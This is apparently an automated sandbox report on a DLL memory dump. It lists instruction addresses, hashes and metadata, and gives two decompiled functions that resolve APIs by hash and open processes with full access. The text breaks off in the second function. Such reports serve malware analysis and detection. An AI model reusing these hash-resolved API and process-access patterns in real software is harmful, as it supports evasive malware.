0x6e7c161e
0x6e7c1622
0x6e7c1626
0x6e7c162d
0x6e7c163f
0x6e7c1655
0x6e7c1660
0x6e7c1661
0x6e7c1662
0x6e7c1663
0x6e7c1664
0x6e7c1667
0x6e7c166b
0x6e7c166f
0x6e7c1676
0x6e7c1688
0x6e7c169e
0x6e7c16a9
0x6e7c16aa
0x6e7c16ab
0x6e7c16ac
0x6e7c16ad
0x6e7c16b0
0x6e7c16b4
0x6e7c16b8
0x6e7c16bf
0x6e7c16d1
0x6e7c16e7
0x6e7c16f2
0x6e7c16f3
0x6e7c16f4
0x6e7c16f5
0x6e7c16f6
0x6e7c16f9
0x6e7c16fd
0x6e7c1701
0x6e7c1708
0x6e7c171a
0x6e7c1730
0x6e7c173b
0x6e7c173c
0x6e7c173d
0x6e7c173e
0x6e7c173f
0x6e7c1742
0x6e7c1746
0x6e7c174a
0x6e7c1751
0x6e7c1763
0x6e7c1779
0x6e7c1784
0x6e7c1785
0x6e7c1786
0x6e7c1787
0x6e7c1788
0x6e7c178b
0x6e7c178f
0x6e7c1793
0x6e7c179a
0x6e7c17ac
0x6e7c17c2
0x6e7c17cd
0x6e7c17ce
0x6e7c17cf
0x6e7c17d0
0x6e7c17d1
0x6e7c17d4
0x6e7c17d8
0x6e7c17dc
0x6e7c17e3
0x6e7c17f5
0x6e7c180b
0x6e7c1816
0x6e7c1817
0x6e7c1818
0x6e7c1819
0x6e7c181a
0x6e7c181d
0x6e7c1821
0x6e7c1825
0x6e7c182c
0x6e7c183e
0x6e7c1854
0x6e7c185f
0x6e7c1860
0x6e7c1861
0x6e7c1862
0x6e7c1863
0x6e7c1866
0x6e7c186a
0x6e7c186e
0x6e7c1875
0x6e7c1887
0x6e7c189d
0x6e7c18a8
0x6e7c18a9
0x6e7c18aa
0x6e7c18ab
0x6e7c18ac
0x6e7c18af
0x6e7c18b3
0x6e7c18b7
0x6e7c18be
0x6e7c18d0
0x6e7c18e6
0x6e7c18f1
0x6e7c18f2
0x6e7c18f3
0x6e7c18f4
0x6e7c18f5
0x6e7c18f8
0x6e7c18fc
0x6e7c1900
0x6e7c1907
0x6e7c1919
0x6e7c192f
0x6e7c193a
0x6e7c193b
0x6e7c193c
0x6e7c193d
0x6e7c193e
0x6e7c1941
0x6e7c1945
0x6e7c1949
0x6e7c1950
0x6e7c1962
0x6e7c1978
0x6e7c1983
0x6e7c1984
0x6e7c1985
0x6e7c1986
0x6e7c198c
0x6e7c198f
0x6e7c1991
0x6e7c199c
0x6e7c19a3
0x6e7c19ac
0x6e7c19b4
0x6e7c19bb
0x6e7c19c4
0x6e7c19cc
0x6e7c19d3
0x6e7c19dc
0x6e7c19e4
0x6e7c19eb
0x6e7c19f4
0x6e7c19fc
0x6e7c1a03
0x6e7c1a0c
0x6e7c1a14
0x6e7c1a1b
0x6e7c1a24
0x6e7c1a2c
0x6e7c1a36
0x6e7c1a3f
0x6e7c1a47
0x6e7c1a51
0x6e7c1a5a
0x6e7c1a62
0x6e7c1a6c
0x6e7c1a75
0x6e7c1a7d
0x6e7c1a87
0x6e7c1a90
0x6e7c1a98
0x6e7c1aa2
0x6e7c1aab
0x6e7c1ab3
0x6e7c1abd
0x6e7c1ac6
0x6e7c1ace
0x6e7c1ad8
0x6e7c1ae1
0x6e7c1ae9
0x6e7c1af3
0x6e7c1afc
0x6e7c1b04
0x6e7c1b0e
0x6e7c1b17
0x6e7c1b1f
0x6e7c1b26
0x6e7c1b2f
0x6e7c1b37
0x6e7c1b3e
0x6e7c1b43
0x6e7c1b51
0x6e7c1b55
0x6e7c1b64
0x6e7c1b6d
0x6e7c1b72
0x6e7c1b79
0x6e7c1b7d
0x6e7c1b81
0x6e7c1b88
0x6e7c1b9a
0x6e7c1bb0
0x6e7c1bbb
0x6e7c1bbc
0x6e7c1bbd
0x6e7c1bbe
0x6e7c1bbf
0x6e7c1bc2
0x6e7c1bc6
0x6e7c1bca
0x6e7c1bd1
0x6e7c1be3
0x6e7c1bf9
0x6e7c1c04
0x6e7c1c05
0x6e7c1c06
0x6e7c1c07
0x6e7c1c08
0x6e7c1c0b
0x6e7c1c0f
0x6e7c1c13
0x6e7c1c1a
0x6e7c1c2c
0x6e7c1c42
0x6e7c1c4d
0x6e7c1c4e
0x6e7c1c4f
0x6e7c1c50
0x6e7c1c51
0x6e7c1c54
0x6e7c1c58
0x6e7c1c5c
0x6e7c1c63
0x6e7c1c75
0x6e7c1c8b
0x6e7c1c96
0x6e7c1c97
0x6e7c1c98
0x6e7c1c99
0x6e7c1c9a
0x6e7c1c9d
0x6e7c1ca0
0x6e7c1ca1
0x6e7c1ca2
0x6e7c1ca9
0x6e7c1cac
0x6e7c1cb7
0x6e7c1cbe
0x6e7c1cc7
0x6e7c1ccf
0x6e7c1cd6
0x6e7c1cdf
0x6e7c1ce7
0x6e7c1cee
0x6e7c1cf7
0x6e7c1cff
0x6e7c1d04
0x6e7c1d0d
0x6e7c1d15
0x6e7c1d2a

Strings

8nsK, xrefs: 6E7C1900

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 8nsK
API String ID: 0-3012451157
Opcode ID: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction ID: 2da114bc9d585c1783a5df0a41bdb82e3a988ff807034f2834a063daba5f857b
Opcode Fuzzy Hash: 60b1e94d03bf4eca53a3807416a63dd6bf793c8da0414a784cc05012ea9fc06e
Instruction Fuzzy Hash: 5D32A672404A069EC719DF60CD505DF77E8AFA1708F204F1DB9895A1B2FF71EA86C682

Uniqueness

Uniqueness Score: -1.00%

Function 6E7CA4E8, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E6E7CA4E8(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E6E7CB658(_t439 + 0x24, _t392, 0x7fffffff);
					if(E6E7CF4D0(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E6E7CF654(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E6E7D2234(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E6E7CF654(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E6E7CF584(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E6E7CF584(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x6e7db808]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E6E7D3064(0x60a28c5c, 0x14e85b34);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E6E7CB5C4(_t439 + 0x34);
											E6E7CB5C4(_t439 + 8);
											goto L65;
										}
										L62:
										E6E7CB5C4(_t439 + 0x34);
										E6E7CB5C4(_t439 + 8);
										goto L63;
									}
									_t392 = E6E7CF4BC(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E6E7CCA8C(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E6E7CC280(_t324);
									if(__eflags != 0) {
										break;
									}
									E6E7CF828(_t439 + 0x14, E6E7CF4CC(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E6E7CF4BC(_t439 + 0x14, E6E7CF4CC(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E6E7D3064(0x60a28c5c, 0x3659ae1e);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E6E7CF828(_t439 + 0x40, E6E7CF4CC(_t439 + 0x3c) + 4);
											 *(E6E7CF4BC(_t439 + 0x40, E6E7CF4CC(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E6E7CCD24(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E6E7CF4BC(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E6E7CAC48(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E6E7CCD24(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E6E7D38F0( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E6E7CF4CC( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E6E7CF4CC( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t413);
										E6E7D38F0(_t243,  *((intOrPtr*)(_t439 + 0x98)), E6E7CF4CC( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
								E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
								 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t308[0xc];
								_t308[7] = _t308[7] + 1;
								E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 4);
								 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc)) = _t308[0xd];
								_t308[1] = _t308[1] + 1;
							}
							goto L46;
						}
						_t433 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x70) = _t433 * 4;
							_t403 = E6E7CF4BC(_t439 + 0x28, _t433 * 4);
							_t392 = _t308[1];
							 *(_t439 + 0x80) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L29:
								_t414 = E6E7D3064(0x8e844d1e, 0x5c3654e3);
								__eflags = _t414;
								if(_t414 != 0) {
									_t416 =  *_t414(0x1fffff, 0,  *((intOrPtr*)(E6E7CF4BC(_t439 + 0x28,  *(_t439 + 0x70)))));
									__eflags = _t416;
									if(_t416 != 0) {
										E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 4);
										 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc)) = _t416;
										_t308[7] = _t308[7] + 1;
										_t271 = E6E7CF4BC(_t439 + 0x28,  *(_t439 + 0x70));
										E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 4);
										 *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc)) =  *_t271;
										_t57 =  &(_t308[1]);
										 *_t57 = _t308[1] + 1;
										__eflags =  *_t57;
									}
								}
								goto L32;
							}
							_t415 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t415 * 4));
								__eflags = _t392 -  *_t403;
								if(_t392 ==  *_t403) {
									break;
								}
								_t415 = _t415 + 1;
								__eflags = _t415 -  *(_t439 + 0x80);
								if(_t415 <  *(_t439 + 0x80)) {
									continue;
								}
								goto L29;
							}
							__eflags = _t415 - 0xffffffff;
							if(_t415 == 0xffffffff) {
								goto L29;
							}
							L32:
							_t433 = _t433 + 1;
							__eflags = _t433 -  *(_t439 + 0x20);
						} while (_t433 <  *(_t439 + 0x20));
						goto L33;
					} else {
						_t434 = 0;
						__eflags = 0;
						do {
							 *(_t439 + 0x64) = _t434 * 4;
							_t404 = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t434 * 4);
							_t392 =  *(_t439 + 0x20);
							 *(_t439 + 0x7c) = _t392;
							__eflags = _t392;
							if(_t392 <= 0) {
								L11:
								_t282 = E6E7CF4CC( *_t439);
								__eflags = _t282 -  *(_t439 + 0x64);
								if(_t282 >  *(_t439 + 0x64)) {
									_t420 = 4 + _t434 * 4;
									_t296 = E6E7CF4CC( *_t439);
									__eflags = _t296 - _t420;
									if(_t296 > _t420) {
										 *((intOrPtr*)(_t439 + 0x9c)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0x98)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 4)), _t420);
										E6E7D38F0( *((intOrPtr*)(_t439 + 0xa4)),  *((intOrPtr*)(_t439 + 0x9c)), E6E7CF4CC( *_t439) - _t420);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 4)), E6E7CF4CC( *_t439) + 0xfffffffc);
									_t22 =  &(_t308[1]);
									 *_t22 = _t308[1] - 1;
									__eflags =  *_t22;
								}
								_t419 = E6E7D3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t419;
								if(_t419 != 0) {
									 *_t419( *((intOrPtr*)(E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64)))));
								}
								_t284 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t284 -  *(_t439 + 0x64);
								if(_t284 >  *(_t439 + 0x64)) {
									_t422 = 4 + _t434 * 4;
									_t285 = E6E7CF4CC( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t285 - _t422;
									if(_t285 > _t422) {
										 *((intOrPtr*)(_t439 + 0xa4)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x64));
										 *((intOrPtr*)(_t439 + 0xa0)) = E6E7CF4BC( *((intOrPtr*)(_t439 + 8)), _t422);
										E6E7D38F0( *((intOrPtr*)(_t439 + 0xac)),  *((intOrPtr*)(_t439 + 0xa4)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) - _t422);
										_t439 = _t439 + 0xc;
									}
									E6E7CF828( *((intOrPtr*)(_t439 + 8)), E6E7CF4CC( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t33 =  &(_t308[7]);
									 *_t33 = _t308[7] - 1;
									__eflags =  *_t33;
								}
								_t434 = _t434 - 1;
								__eflags = _t434;
								goto L20;
							}
							_t421 = 0;
							__eflags = 0;
							while(1) {
								_t392 =  *(E6E7CF4BC(_t439 + 0x28, _t421 * 4));
								__eflags = _t392 -  *_t404;
								if(_t392 ==  *_t404) {
									break;
								}
								_t421 = _t421 + 1;
								__eflags = _t421 -  *(_t439 + 0x7c);
								if(_t421 <  *(_t439 + 0x7c)) {
									continue;
								}
								goto L11;
							}
							__eflags = _t421 - 0xffffffff;
							if(_t421 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t434 = _t434 + 1;
							__eflags = _t434 - _t308[1];
						} while (_t434 < _t308[1]);
						goto L21;
					}
				}
			}

0x6e7ca4f2
0x6e7ca4f4
0x6e7ca4ff
0x6e7ca505
0x6e7ca509
0x6e7ca50e
0x6e7ca514
0x6e7ca524
0x00000000
0x6e7ca526
0x6e7ca526
0x6e7ca531
0x6e7ca531
0x6e7caaaf
0x6e7caab1
0x6e7caab2
0x6e7caaf1
0x6e7caaf5
0x6e7cab03
0x6e7cab11
0x6e7cab11
0x6e7caafc
0x6e7cab17
0x6e7cab1c
0x00000000
0x6e7cab1c
0x6e7cab00
0x6e7cab01
0x00000000
0x6e7ca53b
0x6e7ca53b
0x6e7ca53f
0x6e7ca646
0x6e7ca646
0x6e7ca64b
0x6e7ca75c
0x6e7ca760
0x6e7ca765
0x6e7ca769
0x6e7ca893
0x6e7ca895
0x6e7ca899
0x6e7ca8a2
0x6e7ca8ab
0x6e7ca8af
0x6e7ca8b8
0x6e7ca8bf
0x6e7ca8c0
0x6e7ca8c4
0x6e7ca8c8
0x6e7ca8cc
0x6e7ca8ce
0x6e7caa38
0x6e7caa38
0x6e7caa40
0x6e7caa58
0x6e7caa5a
0x6e7caa5c
0x6e7caa96
0x6e7caa96
0x6e7caa98
0x6e7caa98
0x6e7caa9b
0x6e7caab6
0x6e7caaca
0x6e7caacd
0x6e7caad2
0x6e7caadd
0x6e7caade
0x6e7caae1
0x6e7caae3
0x6e7caaec
0x00000000
0x6e7caaec
0x6e7caa9d
0x6e7caaa1
0x6e7caaaa
0x00000000
0x6e7caaaa
0x6e7caa6d
0x6e7caa7d
0x6e7caa81
0x6e7caa81
0x6e7caa84
0x6e7caa87
0x6e7caa8a
0x6e7caa90
0x00000000
0x00000000
0x00000000
0x6e7caa92
0x6e7ca8d6
0x6e7ca8d6
0x6e7ca8d8
0x6e7ca8dc
0x6e7ca8e1
0x6e7ca8e3
0x6e7ca8e7
0x6e7ca8ea
0x6e7ca8f2
0x6e7ca8f4
0x00000000
0x00000000
0x6e7ca90b
0x6e7ca926
0x6e7ca928
0x6e7ca93b
0x6e7ca93d
0x6e7ca93f
0x6e7ca95a
0x6e7ca95a
0x6e7ca95e
0x6e7ca960
0x00000000
0x00000000
0x6e7ca962
0x6e7ca965
0x6e7ca986
0x6e7ca9a5
0x6e7ca9ab
0x6e7ca9ae
0x6e7ca9b3
0x6e7ca9b4
0x6e7ca9b8
0x00000000
0x00000000
0x6e7ca9c0
0x6e7ca9c0
0x6e7ca9c2
0x6e7ca9ce
0x6e7ca9da
0x6e7ca9e4
0x6e7ca9e7
0x6e7ca9ea
0x6e7ca9ee
0x6e7ca9f5
0x6e7ca9f9
0x6e7ca9fd
0x6e7ca9fe
0x6e7caa02
0x6e7caa07
0x6e7caa0c
0x6e7caa10
0x6e7caa14
0x6e7caa1a
0x6e7caa20
0x6e7caa26
0x6e7caa2c
0x6e7caa31
0x6e7caa32
0x6e7caa32
0x00000000
0x6e7ca9c2
0x00000000
0x6e7ca965
0x6e7ca943
0x6e7ca954
0x6e7ca956
0x6e7ca958
0x00000000
0x00000000
0x00000000
0x6e7ca958
0x6e7ca96b
0x00000000
0x6e7ca96b
0x6e7ca76f
0x6e7ca772
0x6e7ca774
0x00000000
0x00000000
0x6e7ca77c
0x6e7ca77c
0x6e7ca77e
0x6e7ca77e
0x6e7ca78f
0x6e7ca791
0x6e7ca794
0x00000000
0x00000000
0x6e7ca88a
0x6e7ca88b
0x6e7ca88d
0x00000000
0x00000000
0x00000000
0x6e7ca88d
0x6e7ca79a
0x6e7ca79d
0x6e7ca7a7
0x6e7ca7ac
0x6e7ca7ae
0x6e7ca7b4
0x6e7ca7bb
0x6e7ca7bf
0x6e7ca7c4
0x6e7ca7c8
0x6e7cac03
0x6e7cac17
0x6e7cac3a
0x6e7cac3f
0x6e7cac3f
0x6e7ca7df
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7e4
0x6e7ca7ea
0x6e7ca7ef
0x6e7ca7f1
0x6e7ca7f6
0x6e7ca7fd
0x6e7ca802
0x6e7ca804
0x6e7cabc1
0x6e7cabd2
0x6e7cabec
0x6e7cabf1
0x6e7cabf1
0x6e7ca81a
0x6e7ca81f
0x6e7ca81f
0x6e7ca81f
0x6e7ca81f
0x6e7ca833
0x6e7ca851
0x6e7ca856
0x6e7ca866
0x6e7ca883
0x6e7ca885
0x6e7ca885
0x00000000
0x6e7ca79d
0x6e7ca653
0x6e7ca653
0x6e7ca655
0x6e7ca65c
0x6e7ca66a
0x6e7ca66c
0x6e7ca66f
0x6e7ca676
0x6e7ca678
0x6e7ca6a9
0x6e7ca6b8
0x6e7ca6ba
0x6e7ca6bc
0x6e7ca6da
0x6e7ca6dc
0x6e7ca6de
0x6e7ca6f1
0x6e7ca710
0x6e7ca716
0x6e7ca719
0x6e7ca730
0x6e7ca74c
0x6e7ca74e
0x6e7ca74e
0x6e7ca74e
0x6e7ca74e
0x6e7ca6de
0x00000000
0x6e7ca6bc
0x6e7ca67c
0x6e7ca67c
0x6e7ca67e
0x6e7ca68f
0x6e7ca691
0x6e7ca693
0x00000000
0x00000000
0x6e7ca69f
0x6e7ca6a0
0x6e7ca6a7
0x00000000
0x00000000
0x00000000
0x6e7ca6a7
0x6e7ca695
0x6e7ca698
0x00000000
0x00000000
0x6e7ca751
0x6e7ca751
0x6e7ca752
0x6e7ca752
0x00000000
0x6e7ca545
0x6e7ca547
0x6e7ca547
0x6e7ca549
0x6e7ca550
0x6e7ca55e
0x6e7ca560
0x6e7ca564
0x6e7ca568
0x6e7ca56a
0x6e7ca598
0x6e7ca59b
0x6e7ca5a0
0x6e7ca5a4
0x6e7ca5a9
0x6e7ca5b0
0x6e7ca5b5
0x6e7ca5b7
0x6e7cab7e
0x6e7cab8f
0x6e7cabaf
0x6e7cabb4
0x6e7cabb4
0x6e7ca5cd
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5d2
0x6e7ca5e4
0x6e7ca5e6
0x6e7ca5e8
0x6e7ca5f9
0x6e7ca5f9
0x6e7ca5ff
0x6e7ca604
0x6e7ca608
0x6e7ca60e
0x6e7ca615
0x6e7ca61a
0x6e7ca61c
0x6e7cab32
0x6e7cab43
0x6e7cab64
0x6e7cab69
0x6e7cab69
0x6e7ca633
0x6e7ca638
0x6e7ca638
0x6e7ca638
0x6e7ca638
0x6e7ca63b
0x6e7ca63b
0x00000000
0x6e7ca63b
0x6e7ca56e
0x6e7ca56e
0x6e7ca570
0x6e7ca581
0x6e7ca583
0x6e7ca585
0x00000000
0x00000000
0x6e7ca591
0x6e7ca592
0x6e7ca596
0x00000000
0x00000000
0x00000000
0x6e7ca596
0x6e7ca587
0x6e7ca58a
0x00000000
0x00000000
0x6e7ca63c
0x6e7ca63c
0x6e7ca63d
0x6e7ca63d
0x00000000
0x6e7ca549
0x6e7ca53f

Strings

, xrefs: 6E7CAAF7

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 99ce8e1bbf9a7163e2e34fef72df3e8fdb4479fce718b21600afdd5f52c23826
Instruction ID: bb03f2ed3c0508e81112f1908d4bda4116faa7c98f74d024b8fa2c384311af09
Opcode Fuzzy Hash: 99ce8e1bbf9a7163e2e34fef72df3e8fdb4479fce718b21600afdd5f52c23826
Instruction Fuzzy Hash: D31273715046019FC714DFA4CA84AAEB7EDEF84B04F108E2DE99A972B1DB309D05CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6E7C8428, Relevance: 1.8, Strings: 1, Instructions: 531
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E6E7C8428(signed int* __ecx, intOrPtr __edx, void* __eflags) {
				void* __esi;
				void* __ebp;
				signed int* _t173;
				signed int* _t178;
				void* _t180;
				void* _t181;
				intOrPtr* _t188;
				signed int _t202;
				intOrPtr* _t211;
				intOrPtr* _t212;
				intOrPtr* _t217;
				signed int* _t218;
				void* _t219;
				void* _t220;
				void* _t237;
				void* _t238;
				signed int* _t246;
				void* _t247;
				signed int* _t258;
				intOrPtr* _t269;
				signed int* _t277;
				intOrPtr* _t279;
				void* _t283;
				void* _t285;
				void* _t287;
				signed int* _t296;
				void* _t299;
				signed int* _t308;
				intOrPtr* _t310;
